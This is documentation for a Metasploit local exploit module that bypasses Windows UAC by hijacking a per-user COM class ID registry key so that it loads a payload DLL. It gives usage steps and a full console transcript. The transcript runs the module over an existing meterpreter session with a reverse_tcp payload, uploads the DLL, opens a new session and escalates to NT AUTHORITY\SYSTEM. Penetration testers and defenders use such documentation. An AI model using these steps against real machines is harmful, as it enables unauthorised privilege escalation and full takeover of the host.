documentation/modules/exploit/windows/local/bypassuac_comhijack.md
This module will bypass UAC on Windows 7 through to 10 RS3 by hijacking a COM Class ID that is located in the current user hive. This key contains a reference to a DLL that contains a chosen payload. Multiple COM vectors are defined in this module and one is chosen at random at runtime.
The module modifies the registry in order for this exploit to work. The modification is reverted once the exploitation attempt has finished.
This module requires that the payload architecture matches the target operating system architecture. This is due to the fact that the underlying binaries that are invoked match the system architecture.
If a custom DLL is to be used with EXE::Custom, that DLL must match the system
architecture, and should call ExitProcess() after starting the payload in a
different process.
use exploit/windows/local/bypassuac_comhijack.PAYLOAD and configure it correctly, making sure the architecture is correct.set DisablePayloadHandler true.SESSION value is set to the existing session identifier.run.msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : DESKTOP-5A73R51
OS : Windows 10 (Build 14393).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(bypassuac_comhijack) > options
Module options (exploit/windows/local/bypassuac_comhijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST xxx.xx.255.1 yes The listen address
LPORT 8443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(bypassuac_comhijack) > run
[*] [2017.08.16-12:58:31] UAC is Enabled, checking level...
[+] [2017.08.16-12:58:31] Part of Administrators group! Continuing...
[+] [2017.08.16-12:58:32] UAC is set to Default
[+] [2017.08.16-12:58:32] BypassUAC can bypass this setting, continuing...
[*] [2017.08.16-12:58:33] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] [2017.08.16-12:58:33] Uploading payload to C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll ...
[*] [2017.08.16-12:58:33] Executing high integrity process ...
[*] [2017.08.16-12:58:34] Sending stage (1188415 bytes) to xxx.xx.255.159
[*] Meterpreter session 2 opened (xxx.xx.255.1:8443 -> xxx.xx.255.159:51480) at 2017-08-16 12:58:35 +1000
[*] [2017.08.16-12:58:38] Cleaining up registry ...
[!] [2017.08.16-12:58:39] This exploit may require manual cleanup of 'C:\Users\oj\AppData\Local\Temp\DJAyEYXA.dll' on the target
msf exploit(bypassuac_comhijack) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51474 (xxx.xx.255.159)
2 meterpreter x64/windows DESKTOP-5A73R51\oj @ DESKTOP-5A73R51 xxx.xx.255.1:8443 -> xxx.xx.255.159:51480 (xxx.xx.255.159)
msf exploit(bypassuac_comhijack) > sessions -1
[*] Starting interaction with 2...
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM